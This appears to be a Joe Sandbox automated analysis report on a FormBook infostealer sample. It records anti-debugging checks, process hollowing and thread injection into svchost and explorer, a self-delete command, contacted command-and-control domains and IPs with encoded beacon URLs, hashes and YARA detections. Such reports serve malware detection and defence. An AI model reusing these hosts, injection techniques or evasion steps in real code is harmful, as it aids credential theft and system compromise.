Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01710EA5 mov eax, dword ptr fs:[00000030h]	2_2_01710EA5
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01710EA5 mov eax, dword ptr fs:[00000030h]	2_2_01710EA5
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0165AAB0 mov eax, dword ptr fs:[00000030h]	2_2_0165AAB0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0165AAB0 mov eax, dword ptr fs:[00000030h]	2_2_0165AAB0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167FAB0 mov eax, dword ptr fs:[00000030h]	2_2_0167FAB0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016DFE87 mov eax, dword ptr fs:[00000030h]	2_2_016DFE87
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167D294 mov eax, dword ptr fs:[00000030h]	2_2_0167D294
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167D294 mov eax, dword ptr fs:[00000030h]	2_2_0167D294

Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe

Code function: 2_2_01689540 NtReadFile,LdrInitializeThunk,

2_2_01689540

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C7F9D5 SetUnhandledExceptionFilter,	0_2_00C7F9D5
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C7F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00C7F838
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C7FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00C7FBCA
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C88EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00C88EBD

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 103.224.212.221 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 5.101.152.161 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.nordenergogrup.store
Source: C:\Windows\explorer.exe	Domain query: www.sandstormcase.us

Sample uses process hollowing technique

Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe

Section unmapped: C:\Windows\SysWOW64\svchost.exe base address: 350000

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Thread register set: target process: 3452	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Thread register set: target process: 3452	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread register set: target process: 3452	Jump to behavior

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Process created: C:\Users\user\AppData\Local\Temp\bstkiooen.exe "C:\Users\user\AppData\Local\Temp\bstkiooen.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Process created: C:\Users\user\AppData\Local\Temp\bstkiooen.exe "C:\Users\user\AppData\Local\Temp\bstkiooen.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\bstkiooen.exe"	Jump to behavior

Source: explorer.exe, 00000003.00000000.261279004.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.298664617.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.324590825.0000000001980000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program ManagerT7<=ge
Source: explorer.exe, 00000003.00000000.334292418.00000000090D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.261279004.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.304261536.0000000006770000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000000.261279004.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.298664617.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.324590825.0000000001980000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000003.00000000.324252359.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.260934888.0000000001378000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CProgmanile
Source: explorer.exe, 00000003.00000000.261279004.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.298664617.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.324590825.0000000001980000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

0_2_00C7AF0F

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe

Code function: 0_2_00C7F654 cpuid

0_2_00C7F654

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe

Code function: 0_2_00C7DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,

0_2_00C7DF1E

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe

Code function: 0_2_00C6B146 GetVersionExW,

0_2_00C6B146

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 2.2.bstkiooen.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.bstkiooen.exe.1010000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.bstkiooen.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.bstkiooen.exe.1010000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.bstkiooen.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\F61A.tmp, type: DROPPED

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 2.2.bstkiooen.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.bstkiooen.exe.1010000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.bstkiooen.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.bstkiooen.exe.1010000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.bstkiooen.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\F61A.tmp, type: DROPPED

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	2 Command and Scripting Interpreter	11 DLL Side-Loading	512 Process Injection	1 Rootkit	1 Credential API Hooking	1 System Time Discovery	Remote Services	1 Credential API Hooking	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	1 Shared Modules	Boot or Logon Initialization Scripts	11 DLL Side-Loading	1 Virtualization/Sandbox Evasion	1 Input Capture	241 Security Software Discovery	Remote Desktop Protocol	1 Input Capture	Exfiltration Over Bluetooth	3 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	512 Process Injection	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Archive Collected Data	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Deobfuscate/Decode Files or Information	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	13 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	4 Obfuscated Files or Information	LSA Secrets	1 Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	4 Software Packing	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	11 DLL Side-Loading	DCSync	124 System Information Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
primosdv3.1.1.0.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\F61A.tmp	100%	Avira	TR/Crypt.ZPACK.Gen
C:\Users\user\AppData\Local\Temp\F61A.tmp	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\bstkiooen.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\bstkiooen.exe	24%	ReversingLabs	Win32.Trojan.LokiBot

Unpacked PE Files

Source	Detection	Scanner	Label	Download
1.2.bstkiooen.exe.1010000.1.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
13.2.svchost.exe.3a2f840.4.unpack	100%	Avira	TR/ATRAPS.Gen5	Download File
2.2.bstkiooen.exe.400000.1.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
2.0.bstkiooen.exe.400000.5.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
2.0.bstkiooen.exe.400000.7.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
13.2.svchost.exe.60d900.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://ww38.sandstormcase.us/sk29/?f2Jdmp=M3Z0NOd5fAliwCg3EZwT2t6453H5ahVdrEePvIndisgPyIDGbv67zsai9m	0%	Avira URL Cloud	safe
www.nordenergogrup.store/sk29/	0%	Avira URL Cloud	safe
http://www.sandstormcase.us/sk29/?f2Jdmp=M3Z0NOd5fAliwCg3EZwT2t6453H5ahVdrEePvIndisgPyIDGbv67zsai9msKV993IDUg&j8Ot3=AVtD	0%	Avira URL Cloud	safe
http://www.nordenergogrup.store/sk29/?f2Jdmp=/dAaGq0HlK8GRVwC0eZiOsNSw3Abl/LxCMSzQhtOo+vkboQqmAD6TQGCAVscPIh/3NW5&j8Ot3=AVtD	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.sandstormcase.us	103.224.212.221	true	true		unknown
www.nordenergogrup.store	5.101.152.161	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
www.nordenergogrup.store/sk29/	true	Avira URL Cloud: safe	low
http://www.nordenergogrup.store/sk29/?f2Jdmp=/dAaGq0HlK8GRVwC0eZiOsNSw3Abl/LxCMSzQhtOo+vkboQqmAD6TQGCAVscPIh/3NW5&j8Ot3=AVtD	true	Avira URL Cloud: safe	unknown
http://www.sandstormcase.us/sk29/?f2Jdmp=M3Z0NOd5fAliwCg3EZwT2t6453H5ahVdrEePvIndisgPyIDGbv67zsai9msKV993IDUg&j8Ot3=AVtD	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000003.00000000.335934936.000000000F270000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.310782659.000000000F270000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.276212440.000000000F276000.00000004.00000001.00020000.00000000.sdmp	false		high
http://ww38.sandstormcase.us/sk29/?f2Jdmp=M3Z0NOd5fAliwCg3EZwT2t6453H5ahVdrEePvIndisgPyIDGbv67zsai9m	svchost.exe, 0000000D.00000002.517398218.0000000003F1F000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
103.224.212.221	www.sandstormcase.us	Australia		133618	TRELLIAN-AS-APTrellianPtyLimitedAU	true
5.101.152.161	www.nordenergogrup.store	Russian Federation		198610	BEGET-ASRU	true

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	715075
Start date and time:	2022-10-03 15:57:46 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 15s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	primosdv3.1.1.0.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@10/4@2/2
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 84.8% (good quality ratio 80.4%) Quality average: 75.3% Quality standard deviation: 29%
HCA Information:	Successful, ratio: 100% Number of executed functions: 160 Number of non-executed functions: 97
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, ocsp.digicert.com, ctldl.windowsupdate.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
103.224.212.221	nuovo ordine pdf xxxdjcS.exe	Get hash	malicious	Browse	www.ffewv.com/m21d/?L2J=H8wPepZx-XIhtF4&T48Pxlx=w1zJ5h0JUZtA1gSAWeIAg9LelIEx5eSsh/nB0momuv582nOffa9lb58+p1RJzm+hwTQC
	new purchase order.scr.exe	Get hash	malicious	Browse	www.majalahlangitan.com/awqu/?8pDdGnf=ULG6cqAaDBFW+JL7hauOEWg/5rLVubmgN+mLR3PFHBry7NGOHmH+xtWLKcUUM8gnQBB2&FZ-DJ=1bwl
	0098764345678.exe	Get hash	malicious	Browse	www.whipbull.com/zzun/?oDH=0v5Tjp&3fZ4-PZ=Kiv179iAIMPDqB30KPMwtVjQGuO+8qaWaLcZydmce/CQLYP70aekBaXIYi060oxX9tqE
	zapytanie ofertowe09356.exe	Get hash	malicious	Browse	www.modayunpocomas.com/vweq/?n6CtjVk=b1bJK5Cx1WXy0wsf/TqKyRcIRZuicuUWKyI8lsv3lO4f+D6oknJIYD7clvGxbiAJhgLm&iX_ll=Sv9LEx
	Invoice & Shipment Documents.exe	Get hash	malicious	Browse	www.carparts77.info/v4qp/?h0DL3N=68xUuQLn3aXJ4HtgUiPTd3DG+cDGs9nfhzStxVoBaxWiyaw2QFXYJYodS64mZgg8pqgM&1b=4hwh-
	DHL_AWB_NO#907853880911.exe	Get hash	malicious	Browse	www.mybullion.net/s0s2/?5j=vz+QP8SLN37TKOjneZZE1cuVYKuDOMfhwJYzNrMV6hOOF3BWvlF/OgBUiPKqKx/aZVbp&yN=WH-d2B7H
	EXFZCd3tg9.exe	Get hash	malicious	Browse	www.dddiary.com/nj3r/?dN64XRU=eSMq/C3zDSW4Jo81vuP5ZU+9Q9DV/cVNxzH2l+7wLvxBeILQdkpAqMF5V8/HLdhLS/tMPz3PDWhnQaLrvAdStxjEP6P+jZRGfA==&4hxdyt=1bh8g
	nAMQggsILS.exe	Get hash	malicious	Browse	www.bloonmberg.com/0mcc/?_2Mta=-ZVX&9rK=gIiCmOcfAWtrPT0g3SRHuLFCf2RfqeBdwwtXIVnNKrXayJIHmfV7SS09JWW1YjfL/DT5cxkVi+NYShQuYOeL97Pb69a+6rFnkQ==
	bviYfrch3V.exe	Get hash	malicious	Browse	www.carparts77.info/zzun/?nDK=nbNLEBC0E0&8p=pjSA+y3GPrboq7vFdEhenT2kNtiCunEhXGq1wXPdloP3psmNhwIKyHW7aJG50JfDZgbB
	BANK SLIP_WOOHYUN GREEN_HOCHIMINH_EPDA_.exe	Get hash	malicious	Browse	www.katescakesandcreations.com/a2es/?mHIpoV=ARLKp665GTw8UZDxB6R+hmSSvFKE03yPatJrFkpifyqVvX4LZBQEoBDnBtvB/KAhmUfy&8ptdY=7n9xUHkX8LQx_
	Non-Disclosure Secrecy Agreement-pdf.exe	Get hash	malicious	Browse	www.noceducacao.com/u808/?ZJE=qsGJ9h+hw7+6tN26aggUAOEBH60lU4QC0s4/MG5BKIGTShTMYW23d561RCW4qTvBIzuW&bBCl7=4hQPRR4hVDfl2
	ADNOC RFQ 97571784_pdf.exe	Get hash	malicious	Browse	www.whipbull.com/dqat/?GpZ=XCoXTFGOiJ7z7C62UC4286bZQ+xAlFGWYhPDhMtdLmDgMulYBmazykeswcKm7rXPg2uG&3f=hVLhAr3
	DHL VCKDHJDFKJ.exe	Get hash	malicious	Browse	www.com4myhr.com/k0dn/?EPX=wDYm+lCKBVMczjxI/6n+LT39Yp0sptQ6wwVJxLjqcfoLq7UJzXjTflfBaxIvOo4gZCbm&T4=m8O03t
	7zWU13ZU7l.exe	Get hash	malicious	Browse	www.mecontaisso.com/zgtb/?-Zy=6hN/fOg+guzV+MhDC5PFdxotKxG822kQoyqhUgHePguj0j3KzhWZISKEgZonkeckSHMn&m6ALv=tTBL
	vzelSdR55F.exe	Get hash	malicious	Browse	www.mecontaisso.com/zgtb/?yP_PlT=Sd605XspnTxT1D&kT20=6hN/fOg+guzV+MhDC5PFdxotKxG822kQoyqhUgHePguj0j3KzhWZISKEgZoN7uskWFEn
	swift copy$48,400.exe	Get hash	malicious	Browse	www.dxn.asia/hq0b/?FvW8X=PPbHunsP3xKlC8&A2=6X5ZrTFWOEFXk/tzNeOrqRVE2bL0jLMIuPPueaJhWqdq+UaTHYvL2luYdeLRB0SdPoy0
	MTSWIFT_732013817361_861736482_941834_PDF.xlsx	Get hash	malicious	Browse	www.tyrs-it.com/m0d4/?OFNXBz=6lOp3T2XTP1&CBKx=EfBAPrJcvsK7I9TeteAocozOgBY3ZNEx1ttiLGFeDZrTsVB+K7Ypd8Ojd2bsBXDHDk+/Mg==
	JbgH8U3IK5.exe	Get hash	malicious	Browse	www.gotoahairdresser.com/an52/?zVhtnNR8=7Lwjjp0DyVF+MkWIEzP9g1HBxLxVwA/YaxmtBkjh9+kVjFGyiSg8+N0xy9f8vMqv3bi3&lVm=2dCDEJP
	AJXmdXEIOAoqPra.exe	Get hash	malicious	Browse	www.gamccu.com/ufpm/?CXnpTX=2dxlP6n&HJ=Y0gFjoXtyRfEv8y1HukJK8SqB1+HmHUEgXw1X66tksrqsfxyIT8eZ28yC+jyucLJh/fg
	Order-807190402-pdf.exe	Get hash	malicious	Browse	www.formadv.info/uar3/?a6=ISJmyGYdZQdOeefZlCPwl7yFbUmUTtkI0fPOaFKC7ptea6uECNlmMGlfS4Vpco7MJOZH&vZLhq=QpNTqp

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
TRELLIAN-AS-APTrellianPtyLimitedAU	5A5158C712E1588C621124B5DC4B0C3EBFC064FFC0E2C.exe	Get hash	malicious	Browse	103.224.212.220
	CREDIT NOTE.js	Get hash	malicious	Browse	103.224.182.249
	C3133FA0480D9BF0BEFF04059DA58BBEAE895196EDBA8.exe	Get hash	malicious	Browse	103.224.212.220
	E4FB39B3F6AA19028CCDD531437E7994A9B6F62B317AD.exe	Get hash	malicious	Browse	103.224.212.220
	nuovo ordine pdf xxxdjcS.exe	Get hash	malicious	Browse	103.224.212.221
	Purchase order _SIP008.exe	Get hash	malicious	Browse	103.224.182.210
	MV BOZAT ( EX BALTIC SPRINTER).exe	Get hash	malicious	Browse	103.224.212.222
	https://thyrsi.com	Get hash	malicious	Browse	103.224.212.221
	new purchase order.scr.exe	Get hash	malicious	Browse	103.224.212.221
	2C3382E9EB5BBBFE86A88F9D8A75557C3F60707AF088C.exe	Get hash	malicious	Browse	103.224.212.220
	6AA0D341CEE633C2783960687C79D951BF270924DF527.exe	Get hash	malicious	Browse	103.224.212.220
	Chrome_Font.exe	Get hash	malicious	Browse	103.224.182.251
	D6EC737D10AFDAF38CAFEDE9FDE045DD3CE7BC72C6EE1.exe	Get hash	malicious	Browse	103.224.212.220
	[PORT INFO] LOADING ABT 25,000 MT OF ALUMINA IN BULK.exe	Get hash	malicious	Browse	103.224.182.242
	BF9714F60C2B4B43CC0383B3155D9C737271916032051.exe	Get hash	malicious	Browse	103.224.212.220
	F06154D372FA1CD4D5E9C1D5956646C9B4DD80DAB46AB.exe	Get hash	malicious	Browse	103.224.212.220
	F9C9B3FBF4D11F96FF06FC8292D8C67AD6CF543240975.exe	Get hash	malicious	Browse	103.224.212.220
	SMK_TMBV_74848474653535.vbs	Get hash	malicious	Browse	103.224.212.222
	SHIPPING_DELAY_NOTICE_URGENT.PDF.vbs	Get hash	malicious	Browse	103.224.212.222
	0098764345678.exe	Get hash	malicious	Browse	103.224.212.221

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\F61A.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\bstkiooen.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	189440
Entropy (8bit):	7.323091547368136
Encrypted:	false
SSDEEP:	3072:iAWRgxkQBqhbtf3fHdM4/WOaK17VhuuJuIhxlmbelWufH5Z4:HCff9M4+OaK17zTdlmi9H5Z4
MD5:	76EA697ED6A45562B791C6DE86E32587
SHA1:	86386F7A910A1589E2BB13E40E406DA7D0E8EB04
SHA-256:	336D76467E148CAF61A2F4755B72A2197A61DE80576A315DA678F45EF381C635
SHA-512:	4F280A3F595D8B73CDC2BA6B877E2F86296CC57FE4047C322E0E555540FB644CC57DCE69E7204A3199873035603A63D41579FB007D3DDA688B7257E90D8EBC80
Malicious:	true
Yara Hits:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: C:\Users\user\AppData\Local\Temp\F61A.tmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\F61A.tmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: C:\Users\user\AppData\Local\Temp\F61A.tmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: C:\Users\user\AppData\Local\Temp\F61A.tmp, Author: JPCERT/CC Incident Response Group
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZER.....X......<......(..............................................!..L.!This program cannot be run in DOS mode....$............f..f..f......f......f......f.Rich.f.................PE..L....X.?..........................................@.......................................@..........................................................................................................................................................text...4........................... ..`........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\bstkiooen.exe

Download File

Process:	C:\Users\user\Desktop\primosdv3.1.1.0.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	3.633221484430513
Encrypted:	false
SSDEEP:	48:qvVeshJ8x6Q8jNHdhIsnpPnPihJQSsnpVGJZvq0xpXtJZuNOBSvivc7odlM7BXWM:+j84jhdhIKeKU1xtPunqkcK7B2yh
MD5:	A2AF309781DF2F75DC0B57AE63B0F3A9
SHA1:	F4137068334E1856471F4701C96AFAA0470C7D4C
SHA-256:	328F2A0D53ED5C36513F278F32A0D6166A2DC0993ED4F52185198D6200595E1C
SHA-512:	5F7BD4C508E1F9F0B391EBC6B42F6F734B846A76D6903DB3E75B7B671D02BEF2BAECB40BCBB37A41394AECCB8D2591C2F5492AA74E458FF814B184D9668F259B
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 24%
Reputation:	low
